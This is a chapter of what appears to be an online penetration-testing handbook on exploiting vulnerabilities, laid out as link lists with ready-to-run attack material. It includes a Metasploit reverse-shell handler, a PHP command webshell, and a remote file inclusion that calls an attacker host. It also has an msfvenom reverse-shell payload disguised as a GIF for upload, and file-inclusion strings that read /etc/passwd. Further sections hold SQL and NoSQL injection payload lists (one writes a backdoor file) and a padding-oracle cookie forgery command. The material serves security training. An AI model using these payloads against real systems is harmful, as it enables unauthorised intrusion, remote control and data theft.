Chapter 3 - Exploiting Vulnerabilities

Finding Exploits

Search Exploit-DB

Kali> searchsploit windows 2003 | grep -i local

To quickly view the exploit

Kali> searchsploit -x ######.py

Search Google

Google> site:exploit-db.com exploit kernel <= 3

Search Metasploit

Kali> grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/*

Search Vulners

Vulners Audit

Compiling Exploits

Compile for Windows

Kali> i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe

Compile for Architectures

Kali> gcc -m32 -o output32 hello.c (32 bit)
Kali> gcc -m64 -o output hello.c (64 bit)

Catching Exploits

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.123
lhost => 192.168.1.123
msf exploit(multi/handler) > set lport 4444
lport => 4444
msf exploit(multi/handler) > run

Breaking out of Virtualization

Breaking into the Data Centre

VENOM Vulnerability

WebSockets

Hacking with WebSockets HTML5

IPV6

Penetration testing with IPv6

How to pwn things with IPv6

HTTP

Resources

OWASP AppSec Videos

OWASP Testing Guide

Cracking the Lens: Attacking HTTPs hidden attack surface

How I hacked hundreds of companies through their helpdesk

Headers

Find what request methods the web server supports Add the following into your Burp repeater

OPTIONS * HTTP/1.1
...

Send fake IP

Kali> curl --header "X-Forwarded-For: 192.168.1.1" http://$TARGET

Webshells

PHP CMD Shell

Place in body of a PUT request and give it a file name

PUT /directory/shell.php HTTP/1.1
...

<body>
<?php
Echo exec($_GET[cmd]);
?>

Usage:

http://victim/directory/shell.php?cmd=whoami

Resources

XXE

Resources

Exploitation: XML External Entity (XXE) Injection

Exploiting a Real-World XXE Vulnerability

Exploiting XXE Vulnerabilities in file parsing

XSS

Resources

XSS Attack: Busting browsers to root

DOM Clobbering

DOM Flow - Untangling the DOM

CORS

Resources

Exploiting Misconfigured CORS

CSRF

Resources

Computerphile: Cross Site Request Forgery

Updating Anti-CSRF Tokens with BurpSuite

SSRF

Resources

What is Server side Request Forgery?

A New Era of SSRF

Exploiting Server Side Request Forgery on a Node/Express Application (hosted on Amazon EC2)

Example

Sometimes what appears to be RFI can lead to SSRF, here are some commands to help

# Port scan the internal resources available
Kali> wfuzz -c -z range,1-65535 --filter "l>2" http://$TARGET/proxy.php?path=localhost:FUZZ

# If you find one, dirbust it.
Kali> wfuzz -c -w /usr/share/wordlists/dirb/big.txt --filter "l>11" http://$TARGET:8080/FUZZ

RCE

Resources

Node.js Remote Code Execution as a Service

Exploiting Python code execution in the web

Big List of Naughty Strings

PHP Generic Gadget Chains

Utilizing Code Re-use or ROP in PHP Exploits

Pwning PHP Mail Function for fun and RCE

Server Side Template Injection

Resources

Server Side Template Injection

Server Side Template Injection: RCE for the Modern WebApp

API

Resources

Cracking & Fixing REST APIs

LFI

Resources

Local File Inclusion Testing Techniques

Insecure PHP Functions & their Exploits (LFI/RFI)

LFI and RFI -- The Website Security Vulnerability

Local File Inclusion to Remote Code Execution

Local File Inclusion to Remote Code Execution Advanced Exploitation PROC Shortcuts

Examples

file:///etc/passwd
../../../etc/passwd
php://filter/convert.base64-encode/resource=admin.php
php://filter/convert.base64-encode/resource=../../../../../etc/passwd
php://input
    send post data
expect://whoami

Open Redirects

Resources

Open URL Redirects

RFI

Kali> echo "<?php phpinfo(); ?>" > evil.txt
http://$TARGET/index.php?path=http://$ATTACKER/evil.txt

Padding Oracle Attack

Resources

Automated Padding Oracle Attacks with Padbuster

Arguments

url - first argument is the URL
encrypted - second argument is the encrypted text
bits - third argument is the number of bits per block
-cookies - define a cookie to use
-plaintext - plaintext to encrypt

Examples

Kali> padBuster.pl http://$TARGET "ENC-COOKIE-TEXT" 8
                                -cookies "ENC-COOKIE"
                                -plaintext '{"user":"admin","role":"admin"}'

AWS

Resources

AWS PENETRATION TESTING PART 1. S3 BUCKETS

File Upload

Make a backdoor GIF

# As a note, try to overwrite the magic bytes of your backdoor with a valid image
# so that the check will validate. This includes Content-Type.
Kali> msfvenom --list | grep php
Kali> msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.15.237 LPORT=54321 -o evil.php
Kali> echo “FFD8FFEo” | xxd -r -p > evil.gif
Kali> cat evil.php >> evil.gif

Upload From CLI

Kali> curl -X POST
                -F "field1=test"
                -F "file=@/home/user/evil.gif"
                http://$TARGET/upload.php
                --cookie "cookie"

E-Mail

Resources

How to Bypass E-Mail gateways using common payloads

iSCSI

Resources

An interesting route to domain admin via ISCSI

Databases

MySQL

Resources

SQL Injection

SQLMap tricks for advanced SQL injeciton

Examples

username'--
1'||'1'<'2
'OR 1=1;--
'OR 1=1;#
'OR 1=1 LIMIT 1; #
AND 1 = 2 UNION SELECT 1,2,3,4,5
1'1
1 exec sp_ (or exec xp_)
1 and 1=1
1' and 1=(select count(*) from tablenames); --
1 or 1=1
1' or '1'='1
1or1=1
1'or'1'='1
fake@ema'or'il.nl'='il.nl
1 union all select 1,2,3,4,load_file("/etc/passwd"),6
1 union all select 1,2,3,4,"<?php ?>",6 into outfile '/var/www/html/backdoor.php'

MSSQL

Resources

PenTest & Hack MSSQL

SQL Injection Cheatsheet MSSQL

MongoDB

Resources

NoSQL Map

Examples

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
';sleep(5000);
';it=new%20Date();do{pt=new%20Date();}while(pt-it<5000);

PBX

Resources

Pentesting VOIP

Introduction to Telephony and PBX

Examples

Kali> svmap $TARGET
Kali> svwar -m INVITE -eSTART-END $TARGET

PreviousChapter 2 - Recon & Enumeration NextChapter 4 - Windows Post-Exploitation

Last updated 4 years ago

Was this helpful?